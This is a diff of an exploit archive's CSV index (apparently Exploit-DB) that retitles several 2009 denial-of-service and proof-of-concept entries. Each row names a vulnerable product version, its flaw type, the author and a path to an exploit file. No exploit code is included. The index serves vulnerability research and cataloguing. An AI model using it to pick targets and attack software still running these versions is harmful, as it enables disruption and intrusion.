3.0.x - (XML Parser) Memory Corruption / Denial of Service (PoC)",2009-03-30,"Wojciech Pawlikowski",windows,dos,0 +8306,platforms/windows/dos/8306.txt,"Mozilla Firefox 3.0.x - XML Parser Memory Corruption / Denial of Service (PoC)",2009-03-30,"Wojciech Pawlikowski",windows,dos,0 8308,platforms/multiple/dos/8308.c,"Wireshark 1.0.6 - PN-DCP Format String (PoC)",2009-03-30,"THCX Labs",multiple,dos,0 -8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos,0 +8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - 'HEAD' Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos,0 8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)",2009-03-30,"Alfons Luja",windows,dos,0 -8320,platforms/multiple/dos/8320.py,"Opera 9.64 - (7400 nested elements) XML Parsing Remote Crash",2009-03-30,"Ahmed Obied",multiple,dos,0 -8325,platforms/windows/dos/8325.py,"Apple Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos,0 -8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (Denial of Service / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-03-31,"Core Security",multiple,dos,0 +8320,platforms/multiple/dos/8320.py,"Opera 9.64 - 7400 nested elements XML Parsing Remote Crash",2009-03-30,"Ahmed Obied",multiple,dos,0 +8325,platforms/windows/dos/8325.py,"Apple Safari 3.2.2/4b - nested elements XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos,0 +8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - Denial of Service / Cross-Site Scripting",2009-03-31,"Core Security",multiple,dos,0 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) (PoC)",2009-04-01,"fl0 fl0w",windows,dos,0 8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflows (PoC)",2009-04-01,n00b,multiple,dos,0 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 @@ -994,7 +994,7 @@ id,file,description,date,author,platform,type,port 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2)",2009-04-06,DATA_SNIPER,windows,dos,0 8358,platforms/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - '.ui' Off-by-One / Buffer Overflow (PoC)",2009-04-06,Stack,windows,dos,0 -8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - (usnf) Local Heap Overflow (PoC)",2009-04-06,LiquidWorm,windows,dos,0 +8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - 'usnf' Local Heap Overflow (PoC)",2009-04-06,LiquidWorm,windows,dos,0 8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 - Subtitle Local Buffer Overflow (PoC)",2009-04-08,"Bui Quang Minh",windows,dos,0 8378,platforms/windows/dos/8378.pl,"SWF Opener 1.3 - '.swf' Off-by-One Buffer Overflow (PoC)",2009-04-09,Stack,windows,dos,0 8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)",2009-04-10,"fl0 fl0w",windows,dos,0 @@ -1004,11 +1004,11 @@ id,file,description,date,author,platform,type,port 8403,platforms/windows/dos/8403.pl,"WM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 8404,platforms/windows/dos/8404.pl,"RM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 8405,platforms/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 -8406,platforms/openbsd/dos/8406.txt,"OpenBSD 4.5 - (IP datagrams) Remote Denial of Service",2009-04-13,Rembrandt,openbsd,dos,0 +8406,platforms/openbsd/dos/8406.txt,"OpenBSD 4.5 - IP datagrams Remote Denial of Service",2009-04-13,Rembrandt,openbsd,dos,0 8407,platforms/windows/dos/8407.pl,"ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b - Remote Denial of Service",2009-04-14,ksa04,multiple,dos,0 8430,platforms/openbsd/dos/8430.py,"OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service",2009-04-14,nonroot,openbsd,dos,0 -8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 - (Long URL) Local Stack Overflow (PoC)",2009-04-14,SuB-ZeRo,windows,dos,0 +8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)",2009-04-14,SuB-ZeRo,windows,dos,0 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - '.mid' Integer Overflow (PoC)",2009-04-15,HuoFu,windows,dos,0 8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)",2009-04-15,e.wiZz!,windows,dos,0 8451,platforms/windows/dos/8451.pl,"Apollo 37zz - '.m3u' Local Heap Overflow (PoC)",2009-04-16,Cyber-Zone,windows,dos,0 @@ -1027,21 +1027,21 @@ id,file,description,date,author,platform,type,port 8507,platforms/windows/dos/8507.py,"Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC)",2009-04-21,"Dennis Yurichev",windows,dos,0 8511,platforms/windows/dos/8511.pl,"Xitami Web Server 5.0 - Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash",2009-04-22,M4rt1n,windows,dos,0 -8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 +8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - sockets++ crash Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,windows,dos,0 8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - GUI Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,windows,dos,0 8531,platforms/windows/dos/8531.pl,"SDP Downloader 2.3.0 - '.asx' Local Heap Overflow (PoC)",2009-04-24,Cyber-Zone,windows,dos,0 8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 - 'Base64FileEncode()' Buffer Overflow (PoC)",2009-04-27,Nine:Situations:Group,windows,dos,0 -8544,platforms/linux/dos/8544.pl,"iodined 0.4.2-2 - (forged DNS packet) Denial of Service",2009-04-27,"Albert Sellares",linux,dos,0 +8544,platforms/linux/dos/8544.pl,"iodined 0.4.2-2 - forged DNS packet Denial of Service",2009-04-27,"Albert Sellares",linux,dos,0 8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 - '.yuv' Local Stack Overflow (PoC)",2009-04-29,GoLd_M,windows,dos,0 -8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - (Null Pointer) Remote Crash",2009-04-30,"Aditya K Sood",windows,dos,0 +8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - Null Pointer Remote Crash",2009-04-30,"Aditya K Sood",windows,dos,0 8578,platforms/windows/dos/8578.pl,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)",2009-04-30,SirGod,windows,dos,0 8581,platforms/bsd/dos/8581.txt,"Multiple Vendor - PF Null Pointer Dereference",2009-04-30,Rembrandt,bsd,dos,0 8584,platforms/hardware/dos/8584.py,"Addonics NAS Adapter FTP - Remote Denial of Service",2009-05-01,h00die,hardware,dos,0 8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)",2009-05-01,SirGod,windows,dos,0 -8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 -8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 +8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 +8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - 'fasttrap' Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0 8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,windows,dos,0 8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0 @@ -1061,9 +1061,9 @@ id,file,description,date,author,platform,type,port 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - GET Remote Denial of Service",2009-05-18,Stack,windows,dos,0 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)",2009-05-22,n00b,windows,dos,0 8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x/156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié",windows,dos,0 -8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox - (unclamped loop) Denial of Service",2009-05-26,"Thierry Zoller",multiple,dos,0 +8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox - unclamped loop Denial of Service",2009-05-26,"Thierry Zoller",multiple,dos,0 8798,platforms/windows/dos/8798.rb,"Apple Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC)",2009-05-26,"Kevin Finisterre",windows,dos,0 -8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0 +8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - 'KEYGEN' Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0 8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,windows,dos,0 8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)",2009-06-01,LiquidWorm,windows,dos,0 @@ -1072,7 +1072,7 @@ id,file,description,date,author,platform,type,port 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",multiple,dos,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)",2009-06-12,"Blake Cornell",multiple,dos,0 -8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service",2009-06-15,h00die,linux,dos,0 +8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - 'syslog' Denial of Service",2009-06-15,h00die,linux,dos,0 8957,platforms/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0 8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0 8964,platforms/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 @@ -1090,16 +1090,16 @@ id,file,description,date,author,platform,type,port 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié",windows,dos,0 9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,multiple,dos,0 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0 -9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer - (AddFavorite) Remote Crash (PoC)",2009-07-09,Sberry,windows,dos,0 +9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer - 'AddFavorite' Remote Crash (PoC)",2009-07-09,Sberry,windows,dos,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos,0 9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflows (PoC)",2009-07-10,Stack,windows,dos,0 9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0 9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0 9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 -9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - (USER) Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0 +9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0 -9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 +9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - ata device Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 9139,platforms/windows/dos/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,dos,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0 @@ -1118,17 +1118,17 @@ id,file,description,date,author,platform,type,port 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0 -9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 +9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - pecoff executable Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos,0 9220,platforms/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - '.srt' Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,windows,dos,0 9222,platforms/windows/dos/9222.cpp,"FlyHelp - '.CHM' Local Buffer Overflow (PoC)",2009-07-21,"fl0 fl0w",windows,dos,0 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - '.ofl' Local Heap Overflow (PoC)",2009-07-22,hack4love,windows,dos,0 9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 -9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 +9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9242,platforms/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 - findText Unicode Parsing Crash",2009-07-24,Hong10,windows,dos,0 -9264,platforms/linux/dos/9264.py,"stftp 1.10 - (PWD Response) Remote Stack Overflow (PoC)",2009-07-27,sqlevil,linux,dos,0 +9264,platforms/linux/dos/9264.py,"stftp 1.10 - PWD Response Remote Stack Overflow (PoC)",2009-07-27,sqlevil,linux,dos,0 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow (PoC)",2009-07-27,"Jon Oberheide",linux,dos,0 9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)",2009-07-27,"Christoph Bott",hardware,dos,0 9277,platforms/windows/dos/9277.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (PoC)",2009-07-27,hack4love,windows,dos,0 @@ -1144,12 +1144,12 @@ id,file,description,date,author,platform,type,port 9364,platforms/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,windows,dos,0 9368,platforms/windows/dos/9368.pl,"UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)",2009-08-05,SarBoT511,windows,dos,0 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service",2009-08-06,"Shaun Colley",freebsd,dos,0 -9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - (M3U/ASX/WAX/WVX) Local Crash (PoC)",2009-09-10,Dr_IDE,windows,dos,0 +9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - '.M3U'/'.ASX'/'.WAX'/'.WVX' Local Crash (PoC)",2009-09-10,Dr_IDE,windows,dos,0 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-06,"opt!x hacker",windows,dos,0 9382,platforms/windows/dos/9382.txt,"ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)",2009-08-06,"opt!x hacker",windows,dos,0 9392,platforms/windows/dos/9392.pl,"iRehearse - '.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",windows,dos,0 9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",windows,dos,0 -9401,platforms/windows/dos/9401.py,"SpiceWorks 3.6 - Accept Parameter Overflow Crash",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 +9401,platforms/windows/dos/9401.py,"SpiceWorks 3.6 - 'Accept' Overflow Crash",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)",2009-08-11,"fl0 fl0w",windows,dos,0 9417,platforms/windows/dos/9417.txt,"Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash",2009-08-11,webDEViL,windows,dos,0 9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash",2009-08-12,murderkey,windows,dos,0 @@ -1159,13 +1159,13 @@ id,file,description,date,author,platform,type,port 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - 'tgbvpn.sys' Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 9454,platforms/multiple/dos/9454.txt,"Apple Safari 4.0.2 - WebKit Parsing of Floating Point Numbers Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0 -9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (JavaScript SetAttribute) Remote Crash",2009-08-18,"Irfan Asrar",windows,dos,0 +9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - JavaScript SetAttribute Remote Crash",2009-08-18,"Irfan Asrar",windows,dos,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,hack4love,windows,dos,0 9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0 9478,platforms/windows/dos/9478.pl,"BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0 9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-24,hack4love,windows,dos,0 -9496,platforms/windows/dos/9496.txt,"War-FTPD 1.65 - (MKD/CD Requests) Denial of Service",2009-08-24,"opt!x hacker",windows,dos,0 +9496,platforms/windows/dos/9496.txt,"War-FTPD 1.65 - MKD/CD Requests Denial of Service",2009-08-24,"opt!x hacker",windows,dos,0 9506,platforms/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 - '.fft' Crash (PoC)",2009-08-24,the_Edit0r,windows,dos,0 9507,platforms/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 - '.afp' Crash (PoC)",2009-08-24,the_Edit0r,windows,dos,0 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre (Multiple Models) - Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0 @@ -1178,12 +1178,12 @@ id,file,description,date,author,platform,type,port 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)",2009-08-31,hack4love,windows,dos,0 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",windows,dos,0 9549,platforms/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail Service Stack Buffer Overflow (PoC)",2009-08-31,"fl0 fl0w",windows,dos,0 -9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot (Denial of Service)",2009-08-31,TheLeader,windows,dos,0 +9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - MobileSafari Crash + Reboot (Denial of Service)",2009-08-31,TheLeader,windows,dos,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,windows,dos,0 -9573,platforms/windows/dos/9573.pl,"dTunes 2.72 - (Filename Processing) Local Format String (PoC)",2009-09-01,TheLeader,windows,dos,0 +9573,platforms/windows/dos/9573.pl,"dTunes 2.72 - Filename Processing Local Format String (PoC)",2009-09-01,TheLeader,windows,dos,0 9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1)",2009-09-03,"expose 0day",windows,dos,0 9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2)",2009-09-03,"expose 0day",windows,dos,0 -9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0 +9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service",2009-09-04,kingcope,windows,dos,0 9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0 9606,platforms/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",win_x86,dos,0 @@ -1191,13 +1191,13 @@ id,file,description,date,author,platform,type,port 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0 9621,platforms/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 -9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos,0 +9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos,0 9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,windows,dos,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)",2009-09-11,crashbrz,hardware,dos,0 9657,platforms/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 -9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0 +9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - using tel: Remote Crash",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0 9668,platforms/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - '.jpg' Local Crash (PoC)",2009-09-14,the_Edit0r,windows,dos,0 9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - '.XML' Buffer Overflow (PoC)",2009-09-14,the_Edit0r,windows,dos,0 @@ -1207,7 +1207,7 @@ id,file,description,date,author,platform,type,port 9682,platforms/windows/dos/9682.txt,"Adobe Shockwave Player 11.5.1.601 - ActiveX Buffer Overflow (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9683,platforms/windows/dos/9683.txt,"Novell Groupwise Client 7.0.3.1294 - ActiveX Denial of Service (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9684,platforms/windows/dos/9684.txt,"EasyMail Quicksoft 6.0.2.0 - ActiveX Remote Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 -9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 +9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9686,platforms/windows/dos/9686.py,"VideoLAN VLC Media Player < 0.9.6 - 'CUE' Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0 9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0 